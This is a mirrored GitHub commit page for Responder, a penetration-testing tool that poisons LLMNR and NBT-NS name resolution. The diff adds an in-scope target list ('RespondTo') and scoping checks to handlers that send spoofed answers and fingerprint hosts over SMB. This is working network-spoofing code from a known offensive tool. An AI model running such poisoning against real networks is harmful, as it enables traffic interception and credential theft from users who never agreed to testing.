github/Responder
1
0
Fork 0
mirror of https://github.com/lgandx/Responder.git synced 2025-07-07 21:41:21 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Added: in-scope only target. See Responder.conf.

Browse source
This commit is contained in:
lgandx 2013-11-09 13:54:19 -05:00
parent 9b608aad30
commit 0465bd604d
2 changed files with 93 additions and 34 deletions
Download patch file Download diff file Expand all files Collapse all files

4
Responder.conf
View file

@ -19,6 +19,10 @@ Bind_to = 0.0.0.0
;Set this to change the default logging file ;Set this to change the default logging file
SessionLog = Responder-Session.log SessionLog = Responder-Session.log
; ;
;Set this options with your in-scope targets. Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
;
[HTTP Server] [HTTP Server]
;; ;;
;Set this to On if you want to always serve a specific file to the victim. ;Set this to On if you want to always serve a specific file to the victim.

61
Responder.py
View file

@ -63,6 +63,8 @@ Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper() Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename') FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript') WPAD_Script = config.get('HTTP Server', 'WPADScript')
RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",")
#Cli options. #Cli options.
OURIP = options.OURIP OURIP = options.OURIP
LM_On_Off = options.LM_On_Off.upper() LM_On_Off = options.LM_On_Off.upper()
@ -141,6 +143,18 @@ def Is_Finger_On(Finger_On_Off):
if Finger_On_Off == "OFF": if Finger_On_Off == "OFF":
return False return False
def RespondToSpecificHost(RespondTo):
if len(RespondTo)>=1 and RespondTo != ['']:
return True
else:
return False
def RespondToIPScope(RespondTo, ClientIp):
if ClientIp in RespondTo:
return True
else:
return False
################################################################################## ##################################################################################
#NBT NS Stuff #NBT NS Stuff
################################################################################## ##################################################################################
@ -188,6 +202,28 @@ class NB(SocketServer.BaseRequestHandler):
def handle(self): def handle(self):
request, socket = self.request request, socket = self.request
data = request data = request
if RespondToSpecificHost(RespondTo):
if RespondToIPScope(RespondTo, self.client_address[0]):
if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,Wredirect):
buff = NBT_Ans()
buff.calculate(data)
for x in range(1):
socket.sendto(str(buff), self.client_address)
print "NBT-NS Answer sent to: ", self.client_address[0]
logging.warning('NBT-NS Answer sent to: %s'%(self.client_address[0]))
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((self.client_address[0],445))
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
pass
else:
pass
else:
if data[2:4] == "\x01\x10": if data[2:4] == "\x01\x10":
if Validate_NBT_NS(data,Wredirect): if Validate_NBT_NS(data,Wredirect):
buff = NBT_Ans() buff = NBT_Ans()
@ -705,7 +741,7 @@ def Parse_IPV6_Addr(data):
return True return True
def RunLLMNR(): def RunLLMNR():
ALL = "0.0.0.0" ALL = BIND_TO_IP
MADDR = "224.0.0.252" MADDR = "224.0.0.252"
MPORT = 5355 MPORT = 5355
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
@ -717,9 +753,28 @@ def RunLLMNR():
while True: while True:
try: try:
data, addr = sock.recvfrom(1024) data, addr = sock.recvfrom(1024)
if RespondToSpecificHost(RespondTo):
if RespondToIPScope(RespondTo, addr[0]):
if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data):
Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate()
for x in range(1):
sock.sendto(str(buff), addr)
if Is_Finger_On(Finger_On_Off):
try:
Finger = RunSmbFinger((addr[0],445))
logging.warning('[+] OsVersion is:%s'%(Finger[0]))
logging.warning('[+] ClientVersion is :%s'%(Finger[1]))
except Exception:
logging.warning('[+] Fingerprint failed for host: %s'%(addr[0]))
pass
else:
pass
else:
if data[2:4] == "\x00\x00": if data[2:4] == "\x00\x00":
if Parse_IPV6_Addr(data): if Parse_IPV6_Addr(data):
global Name
Name = Parse_LLMNR_Name(data,addr) Name = Parse_LLMNR_Name(data,addr)
buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
buff.calculate() buff.calculate()
@ -805,7 +860,7 @@ class DNSTCP(SocketServer.BaseRequestHandler):
self.request.send(buff) self.request.send(buff)
except Exception: except Exception:
raise pass
################################################################################## ##################################################################################
#HTTP Stuff #HTTP Stuff